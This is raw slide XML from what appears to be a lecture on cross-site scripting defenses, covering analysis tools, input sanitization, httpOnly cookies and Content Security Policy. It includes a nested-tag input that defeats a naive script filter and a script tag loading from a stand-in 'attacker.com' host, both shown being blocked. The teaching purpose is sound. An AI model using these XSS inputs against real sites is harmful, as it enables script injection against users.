              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Programmer Attention Required!!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4905378" y="2024063"/>
            <a:ext cx="423863" cy="506412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01362" tIns="50681" rIns="101362" bIns="50681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4948240" y="3533777"/>
            <a:ext cx="422275" cy="506413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01362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p: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 flipH="1">
            <a:off x="3298825" y="4678364"/>
            <a:ext cx="1860550" cy="80327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8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159377" y="4678364"/>
            <a:ext cx="85725" cy="80327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Bent Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4860925" y="2306640"/>
            <a:ext cx="3963987" cy="2217738"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7555"/>
              <a:gd name="adj2" fmla="val 9735"/>
              <a:gd name="adj3" fmla="val 12643"/>
              <a:gd name="adj4" fmla="val 5392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01362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct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lowchart: Document 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021513" y="6915150"/>
            <a:ext cx="1546225" cy="674688"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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62" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"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Randomized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"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code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438277" y="6507163"/>
            <a:ext cx="3032125" cy="1333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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>WebSSARI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, Huang et al. [2004]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Pixy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Jovanovic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> et al. [2006]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Xie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> and Aiken [2006]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>…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4427538" y="6542090"/>
            <a:ext cx="2593975" cy="108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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Mimamide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> [2005]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Balzarotti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> [2008]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Wasermann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> et al. [2008]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>…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465138" y="2363787"/>
            <a:ext cx="4271962" cy="933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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>preg_replace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	("script", "",input)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"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25619" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1603376" y="4232275"/>
            <a:ext cx="204704" cy="379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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 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112713" y="4608513"/>
            <a:ext cx="4329706" cy="379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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“&lt;scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1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script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ipt&gt;” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“&lt;script&gt;”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"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33" name="Left Arrow 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2328862" y="4232275"/>
            <a:ext cx="2203450" cy="32067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362" tIns="50681" rIns="101362" bIns="50681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084515" y="3892550"/>
            <a:ext cx="1051615" cy="379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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Release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239118" y="3680197"/>
            <a:ext cx="717472" cy="1021861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6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X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1438277" y="5746750"/>
            <a:ext cx="666369" cy="379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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2562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468688" y="6915152"/>
            <a:ext cx="3213100" cy="506413"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1014327"/>
            <a:fld id="{EB69DB10-FCFB-476B-9BFC-E9B4964D7CCB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr algn="ctr" defTabSz="1014327"/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Down Arrow 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7527927" y="6445253"/>
            <a:ext cx="423863" cy="301625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01362" tIns="50681" rIns="101362" bIns="50681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8069263" y="6408738"/>
            <a:ext cx="2419350" cy="379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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Boyd et al. [2004]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2291466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27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="37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Defenses – Prevention - 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Input/Output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cookies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content Security Policy HTML5 (CSP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In next lecture: more on taint analyses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31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213" y="447847"/>
            <a:ext cx="83820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Content Security Policy (CSP)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9006" y="2280768"/>
            <a:ext cx="9192396" cy="2486529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="101370" tIns="50685" rIns="101370" bIns="50685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sz="3100" dirty="0"/>
              <a:t>New browser feature for mitigating XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1"/>
              <a:t>Whitelists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1"/>
              <a:t>safe”scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t> hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>Content-Security-Policy HTTP  header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3913284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02614"/>
            <a:ext cx="10150475" cy="677069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sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Security-Policy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>src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267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘self’ trusted.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="267435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-40531" y="3277234"/>
            <a:ext cx="10150475" cy="1473991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent4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101327" tIns="50663" rIns="101327" bIns="50663" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“trusted.com/jquery.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/myscript.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“attacker.com/sc.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" kern="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92659" y="1936776"/>
            <a:ext cx="1438810" cy="3793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01370" tIns="50685" rIns="101370" bIns="50685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92659" y="3809857"/>
            <a:ext cx="1438810" cy="3793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01370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr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-40531" y="5508616"/>
            <a:ext cx="10150475" cy="1473991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent4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101327" tIns="50663" rIns="101327" bIns="50663" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Refused to load the script ‘attacker.com/sc.js’ because it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>violates the following Content Security Policy directive: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘self’ trusted.com”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" kern="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2593" y="6041239"/>
            <a:ext cx="1518744" cy="3793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01370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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828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CSP Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inlined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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02614"/>
            <a:ext cx="10150475" cy="677069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sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Security-Policy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>src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267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘self’ trusted.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="267435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-40531" y="3277234"/>
            <a:ext cx="10150475" cy="1473991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent4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101327" tIns="50663" rIns="101327" bIns="50663" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;HTML&gt;..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; alert(‘this is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inlined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code’&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" kern="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92659" y="1936776"/>
            <a:ext cx="1438810" cy="3793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01370" tIns="50685" rIns="101370" bIns="50685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92659" y="3809857"/>
            <a:ext cx="1438810" cy="3793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01370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr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-40531" y="5508616"/>
            <a:ext cx="10150475" cy="1473991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent4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101327" tIns="50663" rIns="101327" bIns="50663" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Refused to load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inlined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> script because it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>violates the following Content Security Policy directive: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379252" indent="-379252" defTabSz="1013980" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
